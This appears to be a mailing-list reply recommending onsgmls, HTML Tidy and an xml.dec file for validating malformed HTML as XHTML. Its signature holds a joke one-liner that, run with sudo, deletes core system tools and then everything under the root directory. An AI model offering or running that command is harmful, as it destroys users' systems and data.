vc wrote:
> Hi,
>
> I'm looking for an XML parser that wouldn't stop if it finds a minor error
> in an XML file.
onsgmls keeps going to the end (or a configurable number of errors).
Part of OpenSP from
http://sourceforge.net/projects/openjade/
> I need to parse an HTML file and there are a lot of HTML
> pages that, for instance, don't enclose attribute values in quotes.
But they may be perfectly valid SGML, not XML. SGML permits lots of
abbreviations that are not allowed in XML.
Or they may just be garbage (more likely

You can run them through HTML Tidy to try and make them XHTML.
> Or, for instance, most of HTML pages don't have a root tag/element (that
> could be "html").
That, too, is permitted in some older SGML DTDs for HTML.
> Instead, they have "doctype" tag before and at the same
> level with "html" and XML parsers report an error "no root tag found".
That's a DocType Declaration. It specified the version of HTML being used
(in theory: in practice it's garbage added by editors which don't know
what they are doing and just throw it in to confuse things).
Again, use HTML Tidy to try and make the file into XHTML.
Then validate with:
$ onsgmls -wxml -s /your/path/to/xml.dec filename.xml
If you use Emacs, this can be configured to happen automatically when you
validate a document, and the error lines get coloured and become links to
the location in the document where the error was spotted.
You will need a copy of the XML Declaration (xml.dec). The original at
http://www.w3.org/TR/NOTE-sgml-xml-971215 is starting to suffer from
bitrot and W3C neglect, so I have put a working copy online at
http://xml.silmaril.ie/xml.dec_onsgmls (note this is slightly different
from the original, which is available at
http://xml.silmaril.ie/xml.dec_jc)
Just rename it to xml.dec on your machine.
///Peter
--
sudo sh -c "cd /;/bin/rm -rf `which killall kill ps shutdown mount gdb` *
&;top"